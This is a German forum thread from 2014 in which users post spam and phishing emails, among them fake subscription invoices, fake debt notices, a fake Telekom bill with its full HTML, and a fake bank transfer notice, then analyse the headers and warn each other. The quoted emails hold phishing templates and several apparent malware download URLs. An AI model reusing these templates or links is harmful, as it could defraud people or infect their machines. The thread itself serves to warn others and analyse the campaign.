PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Virus] Neue Bestellung / Lieferschein für xxx / Mahnung



Seiten : 1 [2]

truelife
05.05.2014, 23:02
Sehr geehrter Vertragsnehmer [Vorname] [Nachname],

wir begrüßen Sie als neuen Kunden und bedanken uns bei Ihnen für Ihr Vertrauen. Wir freuen uns sehr, dass Sie sich für „Media Service GmbH“ entschieden haben.

Die 15 tägige Abo Gebühr beträgt 29,99 €. Die Laufzeit Ihres Vertrags beträgt 6 Monate und könnte jeweils zum Monatsende storniert werden. Wir weisen Sie freundlich darauf hin, dass durch die Annahme der AGBs von Media Service GmbH ein rechtskräftiger Vertrag abgeschlossen wurde.

Wir bitten um Überweisung des Rechnungsbetrages innerhalb von 7 Tagen an die im Vertrag genannte Bankverbindung. In der beigefügten Datei finden Sie nochmal die Bestätigung mit unseren Daten. Sollten Sie unser Angebot nicht annehmen, können Sie ohne Probleme innerhalb von 2 Wochen mit Hilfe des der beigefügten Datei den Vertrag stornieren. Sollten wir weder eine Zahlung, noch eine Kündigung innerhalb von 7 Tagen erhalten, werden wir die Kosten des Mahnverfahrens und Verzugszinsen Ihnen in Rechnung stellen müssen.

Wir wünschen Ihnen weiterhin gute Unterhaltung auf unserer Plattform.

Mit freundlichen Grüßen.

Letspay Billing GmbH Moritz Burckhardt
Media Service GmbH

Received: from mout.kundenserver.de ([212.227.17.10]) by mx-ha.gmx.net
(mxgmx005) with ESMTPS (Nemesis) ID: [ID filtered]
<***>; Mon, 05 May 2014 xx:xx:xx +0200
Received: from Ralf-PC (31-16-191-35-dynip.superkabel.de [31.16.191.35])
by mrelayeu.kundenserver.de (node=mreue101) with ESMTP (Nemesis)
ID: [ID filtered]
From: "Service GmbH Media" <matze64 [at] online.de>

Angefügt ist eine Datei mit Namen "Service GmbH Media [Vorname] [Nachname] 05.05.2014.zip". Diese enthält eine weitere, gezippte Datei: "5 Mai 2014 [Vorname] [Nachname] Service GmbH Media.zip". Darin steckt dann eine "[Vorname] [Nachname] 5 Mai 2014 Service Media.com".

Link zu Jotti: http://virusscan.jotti.org/de/scanresult/8a75a36611de5e93a593f01acc853bdc561d3f6a

Seegurke
11.05.2014, 12:06
Hallo,

habe soeben eine ähnliche Mail empfangen (auch an meinen vollständigen Vor- und Zunamen adressiert...

"Sehr geehrter Kunde,

wir sind sehr erfreut Sie als unseren neuen Kunden zu begrüßen. Wir weisen Sie freundlich darauf hin, dass durch die Annahme der AGBs von Download Center GmbH ein rechtskräftiger Vertrag abgeschlossen wurde.

Die Rechnung ist innerhalb von 7 Tagen zu begleichen. Anbei im Anhang finden Sie nochmal die Kostenaufstellung mit unseren Kontodaten. Sollten Sie unser Angebot nicht annehmen, können Sie bequem innerhalb von 2 Wochen mit Hilfe des Schreibens im Anhang den Vertrag stornieren.

Die monatliche Abo Gebühr beträgt 59,99 €. Die Laufzeit Ihres Vertrags beträgt 6 Monate und könnte jeweils zum Monatsende storniert werden.

Sollten wir weder eine Zahlung, noch eine Kündigung innerhalb von 7 Tagen erhalten, werden wir die Gebühren des Mahnverfahrens und Verzugszinsen Ihnen in Rechnung stellen müssen.

Wir wünschen Ihnen weiterhin gute Unterhaltung auf unserer Plattform.

Mit freundlichen Grüßen.

PayNow Office AG Kilian Thurn
Download Center GmbH"

Dabei eine ZIP-Datei, die ich nicht öffnen will, wer weiß welcher Virus da noch drin sitzt.

Kann ich die Mail (und eventuell folgende) einfach ignorieren, oder habe ich Konsequenzen zu erwarten?
Aus den vergangenen Beiträgen entnehme ich, dass dem wahrscheinlich nicht so ist, würde aber gerne sicher gehen.

Danke schon mal im Vorraus,

Gruß,
Seegurke

schara56
11.05.2014, 12:11
...] Dabei eine ZIP-Datei, die ich nicht öffnen will, wer weiß welcher Virus da noch drin sitzt. [...Das ist vermutlich der eigentliche Zweck der Spam: eine Trojaner oder Rootkit zu platzieren.
Anhang nicht öffnen - jedoch wäre der Header ganz interessant.

Roboter
12.05.2014, 17:11
Moin,

Ich vermute das alle diese Mails von der selben Person/Firma kommen, da sie nach ähnlichem Prinzip aufgebaut sind.

1.Mail
"Alle laufenden Arbeiten wurden rechtzeitig durchgeführt,
ich verstehe nicht warum Sie immer noch nicht bezahlt
haben und mir 210.72 euro schulden. Kostenplan im Anhang.

Thi-Vung Gries.
[application/x-zip-compressed] kostenplan.zip (43 KB)
Archivname: kostenplan.zip
Archivgröße: 32275 bytes
Anzahl: 1 Datei

Attribute Größe Änderungsdatum MethodeVerhältnis
--------------------------------------------------------------------------
kostenplan-5... ----- 48640 15-Apr-2014 22:02 Deflated 65,4%
--------------------------------------------------------------------------"

2.Mail
" Sehr geehrter Kunde,

Wir sind ganz dankbar, dass Sie die Dienstleistungen unserer Bank benutzt haben.
Wir teilen Ihnen mit, dass vom 28.04.2014 die Schuld beim Konto #8073148432931160 2268.96 Euro beträgt. Wir bieten Ihnen an, die Rückzahlung der Geldmittel in vollem Umfang bis 14.05.2014 freiwillig durchzuführen.

Die freiwillige Rückzahlung der Geldmittel zum Vertrag #9C944261202120229 bietet Ihnen an:
1) Ihre positive Kredit-Geschichte beibehalten
2) Die Gerichtsverhandlung vermeiden

Im Falle der Nichtzahlung 2268.96 Euro sind wir im Rahmen der aktuellen Gesetzgebung berechtigt, die Gerichtsstrafe wegen der Schuldigkeit auszuführen.
Die Vertragskopie #9C944261202120229 und Zahlungsangaben sind zu diesem Brief als ZIP-Datei "vertrag_9C944261202120229.zip" hinzugefügt.

Mit freundlichen Grüßen,
Leiter des Departments für die Arbeit mit den Schulden.
Munib Büchel
+49 (0) 30 411 410 17
[application/x-zip-compressed] vertrag_9C944261202120229.zip (36 KB)
Archivname: vertrag_9C944261202120229.zip
Archivgröße: 27257 bytes
Anzahl: 1 Datei

Attribute Größe Änderungsdatum MethodeVerhältnis
--------------------------------------------------------------------------
vertrag_12.0... ----- 79052 29-Apr-2014 09:40 Deflated 34,0%
--------------------------------------------------------------------------"

3.Mail
" Zur Eröffnung bekommen Sie einen Gutschein für kostenlose Würstchen von uns geschenkt.
Gutscheinnummer: CF88829A5512A9
Gültigkeit: bis 28.05.2014

Mit freundlichen Grüßen,
Zejlko Spitz
+01553243542
[application/x-zip-compressed] gutschein_CF88829A5512A9.zip (67 KB)
Archivname: gutschein_CF88829A5512A9.zip
Archivgröße: 50018 bytes
Anzahl: 1 Datei

Attribute Größe Änderungsdatum MethodeVerhältnis
--------------------------------------------------------------------------
gutschein_AE... ----- 86016 12-Mai-2014 08:29 Deflated 57,7%
--------------------------------------------------------------------------"




Also nicht die Dateien runterladen..

MfG, Roboter

P.S.:
Also ich wollte nur darauf hinweißen, sodass die verwendeten Nummern und Namen mal im Netz sind und nicht andere darauf rein fallen..

isenaecher
12.05.2014, 19:30
Hallo,

Gestern über GMX hier aufgeschlagen.


Sehr geehrter Nutzer Vorname Isenächer,

wir freuen uns, dass Sie uns Vertrauen geschenkt haben. Wir weisen Sie freundlich darauf hin, dass durch die Bestätigung der AGBs von Video Mediathek GmbH ein rechtskräftiger Vertrag abgeschlossen wurde.

Die Rechnung ist innerhalb von 7 Tagen zu begleichen. Anbei finden Sie nochmal die Kostenaufstellung mit unseren Impressum. Falls Ihnen unsere Dienste nicht gefallen, können Sie ohne Probleme innerhalb von 2 Wochen mit Hilfe des Schreibens im Anhang den Vertrag stornieren.

Die 15 tägige Rechnung beträgt 29,90 €. Die Laufzeit Ihres ABOs beträgt 12 Monate und kann jeweils zum Monatsende gekündigt werden.

Sollten wir weder eine Zahlung, noch eine Kündigung innerhalb von 7 Tagen erhalten, werden wir die Kosten des Mahnverfahrens und Verzugszinsen Ihnen in Rechnung stellen müssen.

Wir wünschen Ihnen weiterhin gute Unterhaltung auf unserer Plattform.

Mit freundlichen Grüßen.

Giropay Billing GmbH Simon Treitzsaur
Video Mediathek GmbH


Return-Path: aurich.chr [at] online.de
Received: from mout.kundenserver.de ([212.227.126.130]) by mx-ha.gmx.net
(mxgmx111) with ESMTPS (Nemesis) ID: [ID filtered]
<isenächer [at] spamvictim.tld>; Sat, 10 May 2014 xx:xx:xx +0200
Received: from Wossidlo-PC (p5DC6D5AB.dip0.t-ipconnect.de [93.198.213.171])
by mrelayeu.kundenserver.de (node=mreue001) with ESMTP (Nemesis)
ID: [ID filtered]
From: "Mediathek GmbH Video" <aurich.chr [at] online.de>
To: "Vorname Isenächer" <poor [at] spamvictim.tld>
Subject: Abo-Abrechnung vom 10 Mai 2014 Video
Date: Sat, 10 May 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;

Was mich wundert, woher die meinen vollen Vor- und Nachnamen haben. :suspect:Guckst Du hier

Content-Type: application/octet-stream;
name="Mediathek GmbH Video Vorname Isenächer 10.05.2014.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Mediathek GmbH Video Vorname Isenächer 10.05.2014.zip"

Die ZIP-Datei habe ich natürlich nicht geöffnet. Da steht vielleicht die "ladungsfähige Adresse" und das "Konto" wo ich es hin überweisen soll drin.:depp:

GMX hat es als Spam identifiziert, mein Spamfilter durch die viele Spamprosa nicht.

Die IP Adressen kann ich nicht so deuten:
212.227.126.130 wird bei 1&1 gehostet
93.198.213.171 bei der Telekom.

Kann sich jemand einen Reim drauf machen?

Gruß

Isenächer

deekay
12.05.2014, 19:48
Auf so schlechtem Deutsch lässt sich nicht reimen.....

RATM1
12.05.2014, 22:04
vielen Dank für Ihre Bestellung bei schlecker.de, nachfolgend finden Sie Ihre Bestellbestätigung.



Der Online-Versandhandel der Schlecker Home Shopping GmbH wurde am 12. August 2012 eingestellt.... (Insolvenz (http://de.wikipedia.org/wiki/Schlecker))
Zudem gab es bei Schlecker höchstens Äpfel oder in Hessen meinetwegen auch Äppel..:p

Und davon mal ab, wieso sollten die Konsolen Profis Ihren Vertrieb über einen Drogerie Händler betreiben...

schlecker.de

RATM

Spikes
12.05.2014, 22:04
Das ist doch die selbe Mail wie diese Mail von Seegurke
Sollte ein Admim vielleicht mal zusammenführen.

[×] Erledigt

kjz1
13.05.2014, 08:58
Die IP Adressen kann ich nicht so deuten:
212.227.126.130 wird bei 1&1 gehostet
93.198.213.171 bei der Telekom.

Kann sich jemand einen Reim drauf machen?

Ja, durchaus. Kundenserver ist der Mailserver für Hosting-Kunden von 1&1. Darüber wurde die Mail ausgeliefert. Wahrscheinlich ein gecrackter Kunden-Account, das könnte die Aurich-Adresse sein. Abgekübelt wurde der Spam in den Mailserver von der Telekom-Adresse, das dürfte ein verseuchter PC an einer DSL-Leitung der Telekom (bzw. die eines Resellers) sein.

madman70
17.05.2014, 18:40
Lustige Abo's - neue Runde...



Sehr geehrter Nutzer xxxxx, <- immerhin richtiger Name

wir sind sehr erfreut Sie als unseren neuen Kunden zu begrüßen. Wir wünschen Ihnen weiterhin gute Unterhaltung auf unserer Plattform.

Wir weisen Sie freundlich darauf hin, dass durch die Annahme der AGBs von Online Download Center GmbH ein rechtskräftiger Vertrag abgeschlossen wurde. Die Rechnung ist innerhalb von 7 Tagen zu begleichen. Anbei finden Sie nochmal die Kostenaufstellung mit unseren Daten. Falls Ihnen unsere Dienste nicht gefallen, können Sie ohne Probleme innerhalb von 2 Wochen mit Hilfe des im Anhang befindlichen Antrages den Vertrag stornieren.

Die monatliche Abo Gebühr beträgt 39,95 €. Die Laufzeit Ihres ABOs beträgt 12 Monate und könnte jeweils zum Monatsende storniert werden.

Sollten wir weder eine Zahlung, noch eine Kündigung innerhalb von 7 Tagen erhalten, werden wir die Gebühren des Mahnverfahrens und Verzugszinsen Ihnen in Rechnung stellen müssen.

Mit freundlichen Grüßen.

Giropay Service AG und Online Download Center GmbH
Liam Winter


Leider können die wohl keine Online-Formulare zum "Abmelden" und das Mailprogramm der Leute alles immer nur als ZIP versenden *hüstel*... Ich habs mal lieber nicht ausgepackt :D

Hier wär noch ein Header dazu:


Return-Path: noam.pierron [at] orange.fr
Received: from smtp.smtpout.orange.fr ([80.12.242.126]) by mx-ha.web.de
(mxweb009) with ESMTP (Nemesis) ID: [ID filtered]
<xxxxx [at] web.de>; Sat, 17 May 2014 xx:xx:xx +0200
Received: from Sauer-PC ([92.73.21.219])
by mwinf5d59 with ME
ID: [ID filtered]
X-ME-Helo: Sauer-PC
X-ME-Auth: bm9hbS5waWVycm9uQHdhbmFkb28uZnI=
X-ME-Date: Sat, 17 May 2014 xx:xx:xx +0200
X-ME-IP: 92.73.21.219
From: "Online Download Center GmbH" <noam.pierron [at] orange.fr>
To: "xxxxx" <poor [at] spamvictim.tld>
Subject: =?utf-8?q?Beantragtes Abo f=C3=BCr xxxxx 17.05.2014?=
Date: Sat, 17 May 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0015_5E31B165.2F16F701"
Envelope-To: <poor [at] spamvictim.tld>

Willem
17.05.2014, 20:01
Ich wußte garnicht, das ich downloade, und gleich kommen die Beträge, die ich löhnen soll! Hier nur die Absender:

1.) Pay Oneline Office AG Anton Beham Dowmload Center AG
2.) Giro Oneline Office AG und Videoflate AG Maxim Schmidt

Bei so vielen AG`s bekommt man ja richtig Angst, aber der Namensaufbau ist doch irgent wie identisch, haben diese Leute wohl den gleichen
Web-Designer.

madman70
18.05.2014, 11:20
Dazu gibt es sogar schon einen Online-Hinweis der Polizei - das ist ja mal ein Service...

http://www.polizei-praevention.de/aktuelles/aktuelles-detailansicht/abo-vertrag-in-mail.html

fridolin
22.05.2014, 08:56
Telekom Rechnung mit *pdf Anhang

Deutsche Telekom AG <andrej.z [at] montaza-lendava.si>

5:41 PM (15 hours ago)

to me
Why is this message in Spam? It's similar to messages that were detected by our spam filters. Learn more
Images are not displayed. Display images below

TELEKOM - ERLEBEN, WAS VERBINDET.
| Entertain Aktion | Service-Forum


Mehr
|
Ihre Rechnung für April 2014
Guten Tag,
mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat April 2014 beträgt: 157,15 Euro.

Wir bitten Sie, die Rechnung zu begleichen. Details zur Ihre Rechnung können Sie hier ansehen:


Ihre detaillierte Rechnung für April 2014, 2935361_A_32163444_S_56_6262.pdf.


Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse. Bei Fragen zu RechnungOnline nutzen Sie unser Kontaktformular.

Der header dazu.
Delivered-To: poor [at] spamvictim.tld
Received: by 10.170.166.197 with SMTP ID: [ID filtered]
Wed, 21 May 2014 xx:xx:xx -0700 (PDT)
X-Received: by 10.14.218.201 with SMTP ID: [ID filtered]
Wed, 21 May 2014 xx:xx:xx -0700 (PDT)
Return-Path: <Deutsche [at] localhost.localdomain>
Received: from parta.p-art.si (lvps46-163-112-224.dedicated.hosteurope.de. [46.163.112.224])
by mx.google.com with ESMTPS ID: [ID filtered]
for <poor [at] spamvictim.tld>
(version=TLSv1 cipher=RC4-SHA bits=128/128);
Wed, 21 May 2014 xx:xx:xx -0700 (PDT)
Received-SPF: none (google.com: Deutsche [at] localhost.localdomain does not designate permitted sender hosts) client-ip=46.163.112.224;
Authentication-Results: mx.google.com;
spf=neutral (google.com: poor [at] spamvictim.tldain does not designate permitted sender hosts) smtp.mail=poor [at] spamvictim.tldain
X-No-Relay: not in my network
Received: from apa188 (unknown [217.237.239.130])
by parta.p-art.si (Postfix) with ESMTPA ID: [ID filtered]
for <poor [at] spamvictim.tld>; Wed, 21 May 2014 xx:xx:xx +0200 (CEST)
Date: Wed, 21 May 2014 xx:xx:xx +0200
From: Deutsche Telekom AG
<andrej.z [at] montaza-lendava.si>
To: poor [at] spamvictim.tld
X-MSMail-Priority: High
X-Priority: 1
Priority: urgent
Importance: high
X-MimeOLE: Produced by Blat v3.1.1
X-Mailer: Blat v3.1.1, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: [ID filtered]
Subject: RechnungOnline Monat April 2014 - Buchungskonto: 4661304843
Content-Transfer-Encoding: 8BIT
Content-Type: text/html;
charset="ISO-8859-1"

der html code:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=WINDOWS-1252"><title>RechnungOnline April 2014, Nr.2462377045</title></head>
<body bgcolor="#ffffff" leftmargin="0" topmargin="0">

<a name="totop"></a>

<table border="0" width="602" align="center" cellpadding="0" cellspacing="0">
<tr>
<td style="line-height: 3px;"><img border="0" style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="3" image_id="4972" alt=""></td>
</tr>
<tr>
<td style="line-height: 1px;"><img border="0" style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="3" image_id="4972" alt=""></td>
</tr>
<tr>
<td>
<table border="0" width="602" cellpadding="0" cellspacing="0">
<tr>
<td style="line-height: 1px;" bgcolor="#ffffff" colspan="3"><img border="0" style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
</tr>
<tr>
<td style="line-height: 1px;" bgcolor="#ffffff"><img border="0" style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
<td width="600">
<table border="0" bgcolor="#ffffff" width="600" cellpadding="0" cellspacing="0"><tr>
<td>
<table border="0" width="600" cellpadding="0" cellspacing="0">
<tr>
<td><a target="_blank" href="http://www.telekom.de/mail/reo/b-21-telekom-00"><img border="0" style="border: none; display: block; font-family: arial; font-size: 12px; color: #e20074;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/T-Logo_600x75_reo.gif" width="600" height="75" title="TELEKOM - ERLEBEN, WAS VERBINDET." alt="TELEKOM - ERLEBEN, WAS VERBINDET."></a></td>
</tr>
<tr>
<td style="line-height: 15px;" width="1" height="15"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="15" image_id="4972" alt=""></td>
</tr>
<!-- Navigation 1 --><tr>
<td>
<table border="0" width="600" cellpadding="0" cellspacing="0">
<tr>
<td style="background: #d0d0d0; line-height: 1px;" width="1" height="1"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
</tr>
<tr>
<td bgcolor="#ededed" width="600">
<table width="600" cellpadding="0" cellspacing="0"><tr>
<td width="561">
<table width="561" cellpadding="0" cellspacing="0"><tr>
<td bgcolor="#d0d0d0" width="1"><img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="30" image_id="4972" alt="|"></td>





<td align="center" nowrap="true"><font style="font-family: Arial,sans-serif; font-size: 12px; color: #4b4b4b;" size="2" color="#4b4b4b" face="Arial"><a style="font-size: 12px; color: #4b4b4b; text-decoration: none;" target="_blank" href="http://www.telekom.de/mail/reo/b-21-reo-tipp-1">Entertain Aktion</a></font></td>






<td width="3"><img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="3" height="30" image_id="4972" alt=""></td>
<td bgcolor="#d0d0d0" width="1"><img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="30" image_id="4972" alt="|"></td>
<td width="3"><img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="3" height="30" image_id="4972" alt=""></td>

<td align="center" nowrap="true"><font style="font-family: Arial,sans-serif; font-size: 12px; color: #4b4b4b;" size="2" color="#4b4b4b" face="Arial"><a style="font-size: 12px; color: #4b4b4b; text-decoration: none;" target="_blank" href="http://www.telekom.de/mail/reo/b-21-reo-tipp-2">Service-Forum</a></font></td>



<td width="5"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="5" height="1" image_id="4972" alt=""></td>
</tr></table>
</td>
<td width="39">
<table width="39" cellpadding="0" cellspacing="0"><tr>
<td bgcolor="#ffffff" width="1"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
<td bgcolor="#e20074" width="37" align="center">
<table width="37" cellpadding="0" cellspacing="0"><tr>
<td width="36" align="center"><font style="font-family: Arial,sans-serif; font-size: 12px;" size="2" color="#ffffff" face="arial,sans-serif"><a style="font-size: 12px; color: #ffffff; text-decoration: none;" target="_blank" href="http://www.telekom.de/mail/reo/b-21-telekom-00"><img border="0" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/icon_home.gif" width="36" height="30" title="Mehr" alt="Mehr"></a></font></td>
<td width="1"><img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="30" image_id="4972" alt=""></td>
</tr></table>
</td>
<td bgcolor="#d0d0d0" width="1"><img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="30" image_id="4972" alt="|"></td>
</tr></table>
</td>
</tr></table>
</td>
</tr>
<tr>
<td style="background: #d0d0d0; line-height: 1px;" width="1" height="1"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="line-height: 15px;" width="1" height="15"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="15" image_id="4972" alt=""></td>
</tr>
<tr>
<td width="600">
<table border="0" width="600" cellpadding="0" cellspacing="0"><tr>
<td valign="top">
<table border="0" width="600" cellpadding="0" cellspacing="0"><tr>
<td width="600" valign="top">
<table border="0" cellpadding="0" cellspacing="0" class="nlvsys-edit nlvsys-area-reo-festnetz-intro nlvsys-item-0">
<tr>
<td>
<!-- MAILING HEADLINE -->
<font style="font-size: 20px;" size="4" color="#e20074" face="Arial,Verdana,Helvetica">
Ihre Rechnung f&uuml;r April 2014
</font>
<!-- MAILING HEADLINE End -->
</td>
</tr>
<tr>
<td style="line-height: 10px;" height="10">
<img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="10" image_id="4972" alt=""><img src="https://www.rechnung-online.telekom.de/mail//2014/05/21/fVLZJutmMeO4vI8G%252BN4RhTIwMDEzOTk2NDk2NzM0MTQ5MzQ%253D/pixel.gif" width="1" height="1"></td>
</tr>
<tr>
<td>
<font style="font-size: 12px;" size="1" color="#4b4b4b" face="arial,sans-serif">
Guten Tag,
</font>
</td>
</tr>
<tr>
<td style="line-height: 10px;" height="10"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="10" image_id="4972" alt=""></td>
</tr>
<tr>
<td>
<font style="font-size: 12px;" size="1" color="#4b4b4b" face="arial,sans-serif">



<!-- VERSP&Auml;TUNG -->
mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat April&nbsp;2014 betr&auml;gt: <strong>157,15&nbsp;Euro</strong>.
<BR><BR>Wir bitten Sie, die Rechnung zu begleichen. Details zur Ihre Rechnung können Sie hier ansehen:<BR>

<font style="font-size: 8px; line-height: 8px;" size="1"><br><br></font>

<a style="text-decoration: none; color: 00A1DE;" href="http://europeandayofartisticcreativity.eu/wp-content/themes/webstat/kundencenter_mobilfunk"><font style="font-size: 12px;" size="1" color="#00A1DE" face="Arial,Verdana,Helvetica">Ihre detaillierte Rechnung für April 2014, 2935361_A_32163444_S_56_6262.pdf</font></a>.


<font style="font-size: 8px; line-height: 8px;" size="1"><br><br></font>
<BR>
Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse. Bei Fragen zu RechnungOnline nutzen Sie unser <a style="text-decoration: none; color: 00A1DE;" target="_blank" href="http://www.telekom.de/mail/rm/kontakt?wt_mc=er_z_kontakt"><font style="font-size: 12px;" size="1" color="#00A1DE" face="Arial,Verdana,Helvetica">Kontaktformular</font></a>.

</td>
</tr>
<tr>
<td style="line-height: 10px;" height="10"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="10" image_id="4972" alt=""></td>
</tr>
<td style="line-height: 15px;" height="15"><img style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="15" image_id="4972" alt=""></td>
</tr>
</table>
</td>
</tr></table>
</td>


</tr></table>
<!-- CONTENT -->

</td>
</tr>
</table>
</td>
</tr></table>
</td>
<td style="line-height: 1px;" bgcolor="#ffffff" height="1"><img border="0" style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
</tr>

<tr><td height="15" style="line-height: 15px;"><img width="1" height="15" alt="" image_id="4972" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" style="display: block;"></td> </tr>





</table>
</td>
<td style="line-height: 1px;" bgcolor="#ffffff" height="1"><img border="0" style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
</tr>
<tr>
<td style="line-height: 1px;" bgcolor="#ffffff" height="1" colspan="3"><img border="0" style="display: block;" src="https://www.rechnung-online.telekom.de/mail//2014/05/21/images/pixel.gif" width="1" height="1" image_id="4972" alt=""></td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>

hoppala
22.05.2014, 12:23
Die gefälschten Telekom-Rechnungen verweisen jeweils auf einen Trojaner-Downloader in einem ZIP-File.
Versendet werden sie offenbar über gehackte Mail-Accounts, also nicht direkt von Botnetzen.
Die Downloader sind in den meisten Fällen, die ich gesehen habe, in einem Wordpress-Verzeichnis "wp-content/themes/webstat" abgelegt (darin befindet ein Unterverzeichnis, in dem die ZIP-Datei liegt, die wird dann über eine Redirection ähnlich wie bei index.html geladen).

Ich vermute, dass die massive Welle von Mail-Account-Hackversuchen, die wir seit Anfang des Jahres beobachten, damit in Zusammenhang steht. Ob es die gleichen Kriminellen sind, oder ob da Arbeitsteilung vorliegt, kann man so von außen natürlich nicht erkennen, ich würde aber letzteres nicht ausschließen (ähnlich wie Botnetze vermietet werden, werden auch geknackte Mail-Accounts verkauft).

hoppala

schara56
27.05.2014, 19:53
q. e. d.
Received: from delta.schober24.com ([83.136.86.118]) by mx-ha.gmx.net
(mxgmx012) with ESMTPS (Nemesis) ID: [ID filtered]
<x>; Tue, 27 May 2014 xx:xx:xx +0200
X-No-Relay: not in my network
Received: from sportpark01 (unknown [217.14.233.31])
by delta.schober24.com (Postfix) with ESMTPA ID: [ID filtered]
for <x>; Tue, 27 May 2014 xx:xx:xx +0200 (CEST)
Date: Tue, 27 May 2014 xx:xx:xx +0200
From: Telekom Leiter Kundenservice
<x>
To: x
http://cootrariopaila.com/pdf/data_telekomde (74.220.207.81)
Man beachte:

Received: from delta.schober24.com ([83.136.86.118]) by mx-ha.gmx.net
83.136.86.118

schara56
03.06.2014, 18:44
Vorsicht mit dem Link - dahinter lauert der Trojaner als ZIP-Datei.
Received: from pepper.han-solo.net ([83.138.66.143]) by mx-ha.gmx.net
(mxgmx005) with ESMTPS (Nemesis) ID: [ID filtered]
<x>; Tue, 03 Jun 2014 xx:xx:xx +0200
X-KSD: <x>
Received: from rt-srv (85-124-150-205.static.xdsl-line.inode.at [85.124.150.205])
(authenticated bits=0)
by pepper.han-solo.net (8.14.4/8.13.6) with ESMTP ID: [ID filtered]
for <x>; Tue, 3 Jun 2014 xx:xx:xx +0200
http://neurochamps.com/online_doc_pdf/ag_fiducia (74.209.214.5)

Group Data Protection Officer Fiducia IT AG E* D*

Der Auftrag wurde entgegengenommen.
03. Juni 2014 um xx:xx:xx Uhr
Verwendete TAN: 341260


Überweisung - Standard

Begünstigter (Name oder Firma): *LUKAS ANTONIUK WU*
IBAN oder Konto: *GB47 LOYD 3084 5510 3049 61*
BIC oder BLZ:*LOYDGB4383C*
bei Kreditinstitut:*BARCLAYS BANK PLC*
Betrag:*1765,47 EUR*
Verwendungszweck:*INV SEO OPT NR4_1218*
Auftraggeber (Kontoinhaber):*Breitscheid-Str. 2*


*Es kann einige Minuten dauern, bis die Transaktion in Ihrem Konto angezeigt wird.
* Weitere Informationen zum Transaktions Volksbank MP.
<http://neurochamps.com/online_doc_pdf/ag_fiducia>

Wurgl
04.06.2014, 14:53
Also da hab ich jetzt wirklich dumm geguckt! Ist aber ein Fake, weil ich weder mit dem Inhaber von laminatshop.de noch mit dem von der-laminatshop.de (so steht es in der Überschrift) zu tun hatte und dann kommt noch die IBAN mit "PL" am Anfang hinzu, mit Polen hatte ich schon gar nichts zu tun.

Und die beiden Domaininhaber von der-laminatshop.de und von laminatshop.de haben wohl ebensowenig mit der Sache zu tun, wie dieser U. B. (dem gehört die zweite Domain).

Und *KEIN* Anhang mit Rechung / Mahnung etc.


Subject: der-laminatshop.de - offene Zahlung




Sehr geehrter laminatshop.de-Kunde,

bei der Überprüfung Ihres Kundenkontos haben wir festgestellt, dass der Betrag von 101,00 Euro noch nicht bei uns eingegangen ist.

Hierbei wurden Zahlungseingänge bis zum 02.06.2014 berücksichtigt. Sollten Sie den fälligen Betrag inzwischen bezahlt haben, danken wir Ihnen und bitten Sie, dieses Schreiben als gegenstandslos zu betrachten.
Andernfalls überweisen Sie bitte den Rechnungsbetrag innerhalb der nächsten 14 Tage, also bis zum 16.06.2014 auf das angegebene Konto. Sollten wir bis zu diesem Zeitpunkt keinen Zahlungseingang festellen, werden weitere rechtliche Schritte eingeleitet.

--------------------------------------
Kontoinhaber: laminatshop.de
IBAN: PL51 11602202 00000002 58272668
